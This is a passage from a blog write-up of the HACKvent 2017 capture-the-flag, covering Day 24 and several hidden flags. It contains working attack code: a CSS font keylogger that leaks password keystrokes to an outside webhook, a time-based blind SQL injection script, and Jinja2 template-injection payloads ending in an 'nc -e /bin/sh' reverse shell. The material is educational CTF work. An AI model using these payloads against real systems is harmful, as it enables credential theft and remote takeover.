    \n    \"\"<\/a>Additionally to the perl password we need a dos code. The program didn’t return anything if the dos code was not 5 characters long. The code must be 5 characters then! I tried brute force the password with a script. But I failed to write the script, as dosbox only supports a limit set of commands and I could not run a loop. By pure luck I entered “AAAAA” as code, and the program returned something which looked very similar to a flag!
    \n    \"\"<\/a>
    \nAgain manually playing with the dos code password I ended up with the right one: “S4n7A”<\/strong>.
    \n    \"\"<\/a>
    \nHV17-Ovze-IUGF-W2xs-x2uE-pVRU<\/strong><\/p>\n
    \n
    \"\"Day 24: Chatterbox (Author: pyth0n33)<\/h1>\n
    … likes to talk<\/em><\/p>\n

    \nDescription
    \n<\/strong>I love to chat secure and private.
    \nFor this I mostly use     http:\/\/challenges.hackvent.hacking-lab.com:1087<\/a>.
    \nIt’s easy to create a private chat and start chatting without a registration.
    \nHint #1:<\/b> the admin is a lazy clicker boy and only likes <a href=”…”><\/a>
    \nHint #2:<\/b> As a passionate designer, the admin loves different fonts.
    \nHint #3:<\/b> For step 2: I’d better be my own CA.
    \nHint #4:<\/b> For step 2: It’s all about the state
    \nHint #5:<\/b> For step 3: python programmers don’t need {{ ninjas }}
    \nSolution
    \n<\/strong>This challenge was super hard. There were three stages until the flag was revealed and each stage could have been a final challenge. The first solver of this challenge came only after several hints and like 48 hours. I was very frustrated at the beginning as this was on Christmas Eve and I was looking forward to finally be released of the HACKvent stress. Because nobody solved this challenge in time they changed the rules for this challenge and the first 10 solvers would get full points. In the end I could jump to the 8th place in the global ranking, because I was solver number 7 of this challenge! \ud83d\ude42
    \nStage 1:<\/strong>
    \nThe website to chat contained several things which were suspicious. There was a working chat, you could create your own secret chat with a CSS stylesheet, a form to contact the administrator, an API which returned PHP errors, etc, etc. With the description of the challenge and hint #1 I assumed that I had to create my own chat and invite the admin over the feedback form to get him into my chat. I copied the original CSS file and changed the background-url to hookbin, so I could verify if somebody would click on my link:<\/p>\n
    body {\n    background-image: url(\"https:\/\/hookb.in\/vew26lmB\");\n}<\/pre>\n
    And very well, some seconds\/minutes after I sent the clickable link(<a href=”url-to-secret-chat”>clickme<\/a>) to the admin I registered a call from the IP address of challenges.hackvent.hacking-lab.com on my hookb.in backend.
    \nWith hint #2 I found this vulnerability:     http:\/\/mksben.l0.cm\/2015\/10\/css-based-attack-abusing-unicode-range.html<\/a> This is basically a keylogger implemented in CSS! I added all alphanumeric characters and some special characters to the CSS and then tried to hook this PoC font to the chat input field. But the admin was not typing anything. Then I had the idea to hook it to the password input field from the the password form and it worked!<\/p>\n
    body {\n    background-image: url(\"https:\/\/hookb.in\/vew26lmB\");\n}\n...\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?A);\n unicode-range:U+0041;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?B);\n unicode-range:U+0042;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?C);\n unicode-range:U+0043;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?D);\n unicode-range:U+0044;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?E);\n unicode-range:U+0045;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?F);\n unicode-range:U+0046;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?G);\n unicode-range:U+0047;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?H);\n unicode-range:U+0048;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?I);\n unicode-range:U+0049;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?J);\n unicode-range:U+004A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?K);\n unicode-range:U+004B;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?L);\n unicode-range:U+004C;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?M);\n unicode-range:U+004D;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?N);\n unicode-range:U+004E;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?O);\n unicode-range:U+004F;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?P);\n unicode-range:U+0050;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?Q);\n unicode-range:U+0051;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?R);\n unicode-range:U+0052;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?S);\n unicode-range:U+0053;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?T);\n unicode-range:U+0054;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?U);\n unicode-range:U+0055;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?V);\n unicode-range:U+0056;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?W);\n unicode-range:U+0057;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?X);\n unicode-range:U+0058;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?Y);\n unicode-range:U+0059;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?Z);\n unicode-range:U+005A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_exec_);\n unicode-range:U+0060;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?a);\n unicode-range:U+0061;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?b);\n unicode-range:U+0062;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?c);\n unicode-range:U+0063;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?d);\n unicode-range:U+0064;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?e);\n unicode-range:U+0065;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?f);\n unicode-range:U+0066;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?g);\n unicode-range:U+0067;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?h);\n unicode-range:U+0068;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?i);\n unicode-range:U+0069;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?j);\n unicode-range:U+006A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?k);\n unicode-range:U+006B;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?l);\n unicode-range:U+006C;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?m);\n unicode-range:U+006D;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?n);\n unicode-range:U+006E;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?o);\n unicode-range:U+006F;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?p);\n unicode-range:U+0070;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?q);\n unicode-range:U+0071;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?r);\n unicode-range:U+0072;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?s);\n unicode-range:U+0073;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?t);\n unicode-range:U+0074;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?u);\n unicode-range:U+0075;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?v);\n unicode-range:U+0076;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?w);\n unicode-range:U+0077;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?x);\n unicode-range:U+0078;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?y);\n unicode-range:U+0079;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?z);\n unicode-range:U+007A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_space_);\n unicode-range:U+0020;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_quote_);\n unicode-range:U+0021;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_escl_);\n unicode-range:U+0022;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_hash_);\n unicode-range:U+0023;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_dollar_);\n unicode-range:U+0024;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_per_);\n unicode-range:U+0025;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_and_);\n unicode-range:U+0026;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_squot_);\n unicode-range:U+0027;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_br1_);\n unicode-range:U+0028;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_br2_);\n unicode-range:U+0029;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_mult_);\n unicode-range:U+002A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_plus_);\n unicode-range:U+002B;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_comma_);\n unicode-range:U+002C;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_dash_);\n unicode-range:U+002D;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_dot_);\n unicode-range:U+002E;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_slash_);\n unicode-range:U+002F;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?0);\n unicode-range:U+0030;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?1);\n unicode-range:U+0031;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?2);\n unicode-range:U+0032;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?3);\n unicode-range:U+0033;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?4);\n unicode-range:U+0034;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?5);\n unicode-range:U+0035;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?6);\n unicode-range:U+0036;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?7);\n unicode-range:U+0037;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?8);\n unicode-range:U+0038;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?9);\n unicode-range:U+0039;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_dp_);\n unicode-range:U+003A;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_sp_);\n unicode-range:U+003B;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_kl_);\n unicode-range:U+003C;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_equal_);\n unicode-range:U+003D;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_gr_);\n unicode-range:U+003E;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_question_);\n unicode-range:U+003F;\n}\n@font-face{\n font-family:poc;\n src: url(https:\/\/hookb.in\/vew26lmB\/?_at_);\n unicode-range:U+0040;\n}\n#password{\n font-family:poc;\n}<\/pre>\n
    This gave me the password “Christmas2017”<\/strong> which led to the link “http:\/\/challenges.hackvent.hacking-lab.com:1088\/?key=E7g24fPcZgL5dg78” of stage 2!
    \nStage 2:<\/strong>
    \nAgain, there were many distraction points. First I assumed it to be a command injection. As there were tools like “ping” used on the website. After hint #3 (Better be my own CA) was released I knew I had to focus on the CSR tool. There you could submit a CSR and a CA certificate was generated for you.
    \nI fuzzed the input fields of the certificate and found out that the server will return an error 500 if the state field contained a quote (‘)! I tried to reproduce it on my own computer with openssl and it worked. So, the CA must parse the CSR and do something with it. Playing with the State field inputs revealed that it was an timebased blind SQL-injection. Only problem there was, that it had to be embedded in a valid CSR! I tried to write a tamper script for sqlmap which generates a CSR. But unfortunately this didn’t work, because sqlmap generates payloads which are too long for the State field! \ud83d\ude41 Solution to this was to write my own time-based blind sql injection script. It was a lot of work, but implementing it was actually fun and I’ve learned a lot!
    \nTo work faster and find the right SQL query I wrote a small script. With this I could just pass the SQL query as parameter and it would automatically generate the CSR and do the post request.<\/p>\n
    #!\/bin\/sh\nopenssl genrsa -out tmp.key 1024\nopenssl req -new --key tmp.key -out tmp.csr -subj\n\"\/C=CH\/ST=$1\/L=1337\/O=1337\/OU=1337\/CN=1337\/emailAddress=1337\"\nCSR=`cat tmp.csr`\nCSR=$(php -r  \"echo rawurlencode('$CSR');\")\nURL=\"http:\/\/challenges.hackvent.hacking-lab.com:1088\/php\/api.php?function=csr&argument=&key=E7g24fPcZgL5dg78\"\ncurl -i -X POST $URL -d \"csr=$CSR\"|sed \"s\/<br>\/\\\\n\/g\"<\/pre>\n
    My sql query to trigger the vulnerability was:<\/p>\n
    \"'or (select sleep(1) from information_schema.tables) or'\"<\/pre>\n
    If the request took longer than 1 second then the query was successful! I wrote a script which first dumped the database name, then the tables, after that the columns and finally the content.<\/p>\n
    import os\nimport urllib\nimport subprocess\nimport timeit\nimport requests\nURL=\"http:\/\/challenges.hackvent.hacking-lab.com:1088\/php\/api.php?function=csr&argument=&key=E7g24fPcZgL5dg78\"\nCHARSET=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-$!#@-=:?&_\"\ndef make_request(payload):\n\tos.system('openssl req -new --key tmp.key -out tmp.csr -subj \"\/C=CH\/ST='+payload+'\/L=1337\/O=1337\/OU=1337\/CN=1337\/emailAddress=1337\"')\n\tcsr = subprocess.check_output(['cat', 'tmp.csr'])\n\tr = requests.post(URL, data={\"csr\": csr})\n\tt = r.elapsed.total_seconds()\n\tif t > 1:\n\t\treturn True\n\telse:\n\t\treturn False\ndef verify_table(table):\n\tpayload = \"' or (select sleep(1) from hv24_2.\"+table+\") or '\"\n\treturn payload\ndef find(start_pos, payload, title):\n\tprint(\"[+] Looking for \" + title + \" ...\")\n\tname = \"\"\n\tfor x in CHARSET[start_pos:-1]:\n\t\tpayl = payload.replace(\"XXX%\", name+x+\"%\")\n\t\tif make_request(payl):\n\t\t\tname += x\n\t\t\tbreak\n\t\tif name:\n\t\t\tprint(name)\n\t#If nothing found after first loop, we already dumped all the information\n\tif not name:\n\t\treturn \"___done___\"\n\tn = len(name)\n\twhile True:\n\t\tfor x in CHARSET:\n\t\t\tpayl = payload.replace(\"XXX%\", name+x+\"%\")\n\t\t\tif make_request(payl):\n\t\t\t\tname += x\n\t\t\t\tbreak\n\t\tprint(name)\n\t\tif n == len(name):\n\t\t\tbreak\n\t\telse:\n\t\t\tn = len(name)\n\tprint(\"[+] Found \" + title + \": \" + name)\n\treturn name\n# Only once, generate key\nos.system('openssl genrsa -out tmp.key 1024')\n# Find databases\ni = 0\nlast_found=\"\"\nwhile (i < len(CHARSET)):\n\tif last_found:\n\t\ti = CHARSET.index(last_found[0])+1\n\tlast_found = find(i, \"'or(select sleep(1)from information_schema.tables WHERE table_schema like binary 'XXX%')or'\", \"Database\")\n\tif last_found == \"___done___\":\n\t\tbreak\n\ti += 1\n# find Tables for hv24_2\ni = 0\nlast_found=\"\"\nwhile (i < len(CHARSET)):\n\tif last_found:\n\t\ti = CHARSET.index(last_found[0])+1\n\tlast_found = find(i, \"'or(select sleep(1)from information_schema.tables WHERE table_schema = 'hv24_2' && table_name like binary 'XXX%')or'\", \"Table\")\n\tif last_found == \"___done___\":\n\t\tbreak\n\ti += 1\n# find columns for certificates & keystorage\ni = 0\nlast_found=\"\"\nwhile (i < len(CHARSET)):\n\tif last_found:\n\t\ti = CHARSET.index(last_found[0])+1\n\tlast_found = find(i, \"'or(select sleep(1)from information_schema.columns WHERE table_name='certificates'&&column_name like binary 'XXX%')or'\", \"Column\")\n\tif last_found == \"___done___\":\n\t\tbreak\n\ti += 1\ni = 0\nlast_found=\"\"\nwhile (i < len(CHARSET)):\n\tif last_found:\n\t\ti = CHARSET.index(last_found[0])+1\n\tlast_found = find(i, \"'or(select sleep(1)from information_schema.columns WHERE table_name='keystorage'&&column_name like binary 'XXX%')or'\", \"Column\")\n\tif last_found == \"___done___\":\n\t\tbreak\n\ti += 1\n# get private_key from keystorage! :)\ni = 0\nwhile (i < len(CHARSET)):\n\tfind(i, \" ' or ( select sleep(1) from hv24_2.keystorage WHERE private_key like binary '%1089XXX%' ) or ' \", \"DATA\")\n\tif last_found == \"___done___\":\n\t\tbreak\n\ti += 1\n<\/pre>\n
    With this I have found the database “hv24_2” with the tables “certificates” and “keystorage”. In the table “keystorage” is the column “private_key” which contained the key for stage 3:
    \nhttp:\/\/challenges.hackvent.hacking-lab.com:1089\/?key=W5zzcusgZty9CNgw
    \nStage 3:<\/strong>
    \nStage 3 is a simple, yet unfinished, webshop where you can buy crypto-currency t-shirts.
    \nHint #5 (For step 3: python programmers don’t need {{ ninjas }}) was very helpful. After googling a bit I found the Flask framework which leverages the Jinga2 engine and it uses curly brackets {{ }}! Jinga2 <-> ninja. \ud83d\ude42 If not implemented correctly Server Side Template Injections (SSTI) is possible:
    \n    https:\/\/nvisium.com\/blog\/2015\/12\/07\/injecting-flask\/<\/a>
    \n    https:\/\/nvisium.com\/blog\/2016\/03\/09\/exploring-ssti-in-flask-jinja2\/<\/a>
    \nNow this stage was pretty straight forward and I solved it much faster than 1 & 2. First I was able to read out the config.items(), but this did not contain anything useful.<\/p>\n
    http:\/\/challenges.hackvent.hacking-lab.com:1089\/{{config.items()}}\/99?key=W5zzcusgZty9CNgw<\/pre>\n
    Later I’ve found the used classes:<\/p>\n
    http:\/\/challenges.hackvent.hacking-lab.com:1089\/{{''.__class__.__mro__[1].__subclasses__()}}\/99?key=W5zzcusgZty9CNgw<\/pre>\n
    This revealed all the classes I could leverage for the attack. First the class 302 <class ‘click.utils.LazyFile’> got my attention. I could read the \/etc\/passwd file with this URL:<\/p>\n
    http:\/\/challenges.hackvent.hacking-lab.com:1089\/{{''.__class__.__mro__[1].__subclasses__()[302](\"\/etc\/passwd\").read()}}\/99?key=W5zzcusgZty9CNgw<\/pre>\n
    \"\"<\/a>
    \nUnfortunately I did not find another class which led me to list directories and content. Thanks to the passwd file I knew, that there is a \/home\/hv24 directory. But I could not guess the flag file. I had to look further…
    \nThen I found: 37 <class ‘subprocess.Popen’>! With popen it is possible to run shell commands on the system! I was not able to read the outputs from the commands, therefore I went for a reverse shell! \ud83d\ude42
    \nOn my server I ran netcat to listen for incoming connections:<\/p>\n
    $  nc -l -p 1337 -vvv\nlistening on [any] 1337 ...<\/pre>\n
    And I opened this URL with the command to connect back to my server:<\/p>\n
    http:\/\/challenges.hackvent.hacking-lab.com:1089\/{{''.__class__.__mro__[1].__subclasses__()[37]([\"nc\", \"-e\", \"\/bin\/sh\", \"sigterm.ch\", \"1337\"])}}\/99?key=W5zzcusgZty9CNgw<\/pre>\n
    \"\"<\/a>
    \nOn my server I got the reverse shell access:<\/p>\n
    $  nc -l -p 1337 -vvv\nlistening on [any] 1337 ...\nconnect to [10.8.111.199] from urb80-74-140-188.ch-meta.net [80.74.140.188] 32782\nls\nbin\nboot\ndev\netc\nhome\nlib\nlib64\nmedia\nmnt\nopt\nproc\nroot\nrun\nsbin\nsrv\nsys\ntmp\nusr\nvar\ncd \/home\nls\nflag\ncat flag\nHV17-7h1s-1sju-t4ra-nd0m-flag<\/pre>\n
    HV17-7h1s-1sju-t4ra-nd0m-flag<\/strong><\/p>\n
    \n
    Hidden Flags<\/h1>\n
    Hidden Flag #1<\/h2>\n
    The fist hidden flag was in the calendar. I tried to access days of the calendar which were > than 24. For example, when accessing day 25:<\/p>\n
    https:\/\/hackvent.hacking-lab.com\/challenge.php?day=25\nThe resource (#1959) you are trying to access, is not (yet) for your eyes.<\/pre>\n
    The comment was about resource #1959, so I tried to access day 1959:<\/p>\n
    https:\/\/hackvent.hacking-lab.com\/challenge.php?day=1959\nThe resource (#25) you are trying to access, is not (yet) for your eyes.<\/pre>\n
    When calling day 26 the mentioned resource was 1958, for 27 = 1957 and so on… Adding the two numbers it always ends up in 1984. I requested day 1984, which told me “The resource you are trying to access, is hidden in the header.”
    \n    \"\"<\/a>Looking at the headers revealed the flag:\"\"<\/a>
    \nHV17-4llw-aysL-00ki-nTh3-H34d<\/strong><\/p>\n
    \n
    Hidden Flag #2<\/h2>\n
    Hidden Flag number 2 was in day 18<\/a>:
    \n    \"\"<\/a>
    \nHV17-Muq9-gzvU-t3Bg-O3jo-iGml<\/strong><\/p>\n
    \n
    Hidden Flag #3<\/h2>\n
    The robots.txt file of the hackvent webserver contained this text:<\/p>\n
    We are people, not machines\n<\/pre>\n
    According to this link I tried to read people.txt:<\/p>\n
    What's about akronyms?<\/pre>\n
    I think the author of it meant synonyms and not acronyms. Eventually I got this and tried to read humans.txt<\/p>\n
    All credits go to the following incredibly awesome HUMANS (in alphabetic order):\navarx\nDanMcFly\nHaRdLoCk\ninik\nLukasz\nM.\nMorpheuz\nMuffinX\nPS\npyth0n33\nHV17-bz7q-zrfD-XnGz-fQos-wr2A<\/pre>\n
    HV17-bz7q-zrfD-XnGz-fQos-wr2A<\/strong><\/p>\n
    \n
    Hidden Flag #4<\/h2>\n
    I was browsing the CSS folder and there I’ve found an Easter-Egg containing a QR code:
    \n    \"\"<\/a>
    \nHE17-W3ll-T00E-arly-forT-his!<\/strong><\/p>\n
    \n
    Hidden Flag #5<\/h2>\n
    The last hidden flag was on the challenges.hackvent.hacking-lab.com server. I ran nmap to look for open ports and found the telnet port:<\/p>\n
    $ nmap -sS challenges.hackvent.hacking-lab.com\nStarting Nmap 7.60 ( https:\/\/nmap.org ) at 2017-12-30 10:43 CET\nNmap scan report for challenges.hackvent.hacking-lab.com (80.74.140.188)\nHost is up (0.012s latency).\nrDNS record for 80.74.140.188: urb80-74-140-188.ch-meta.net\nNot shown: 987 filtered ports\nPORT      STATE  SERVICE\n22\/tcp    open   ssh\n23\/tcp    open   telnet\n80\/tcp    closed http\n443\/tcp   closed https\n1034\/tcp  open   zincite-a\n1037\/tcp  open   ams\n1087\/tcp  open   cplscrambler-in\n1088\/tcp  open   cplscrambler-al\n1089\/tcp  open   ff-annunc\n6667\/tcp  open   irc\n8081\/tcp  open   blackice-icecap\n9999\/tcp  closed abyss\n31337\/tcp open   Elite\nNmap done: 1 IP address (1 host up) scanned in 4.96 seconds\n<\/pre>\n
    After connecting to the telnet port a nice ASCII animation of Santa Clause was shown. Santa Clause gave us a present (flag) to assemble ourselves. The flag was shown in ASCII art, but the sequence passed so fast, it was impossible to read it. I saved the output to a file:<\/p>\n
    telnet challenges.hackvent.hacking-lab.com 23 | tee -a hidden5.txt<\/pre>\n
    I opened this file with a text editor and then I could read the flag.
    \nHV17-UH4X-PPLE-ANND-IH4X-T1ME<\/strong>
    \n <\/p>\n","protected":false},"excerpt":{"rendered":"
    Like every year before Christmas the HACKvent is on! It is a Jeopardy CTF competition in the style of an advent calendar. Every day at 00:00 a new challenge is released. It starts with easy ones and then becomes harder … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,5],"tags":[21,22,27,31,37,38,39,66,68,69,71,82,97,110,116,123,124,125,126,128,129,130,131,137,140,141,165,167],"class_list":["post-695","post","type-post","status-publish","format-standard","hentry","category-ctf","category-security","tag-asm","tag-assembly","tag-bash","tag-buffer-overflow","tag-capture-the-flag","tag-crypto","tag-ctf","tag-hacking","tag-hacking-lab","tag-hackvent","tag-hackvent-2017","tag-hv17","tag-linux","tag-offensive","tag-password","tag-puzzle","tag-pwn","tag-python","tag-re","tag-reverse-engineering","tag-reverse-shell","tag-reversing","tag-root","tag-security","tag-shell","tag-shell-script","tag-web-application-security","tag-write-up"],"_links":{"self":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts\/695","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=695"}],"version-history":[{"count":0,"href":"https:\/\/sigterm.ch\/index.php?rest_route=\/wp\/v2\/posts\/695\/revisions"}],"wp:attachment":[{"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=695"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=695"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sigterm.ch\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=695"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}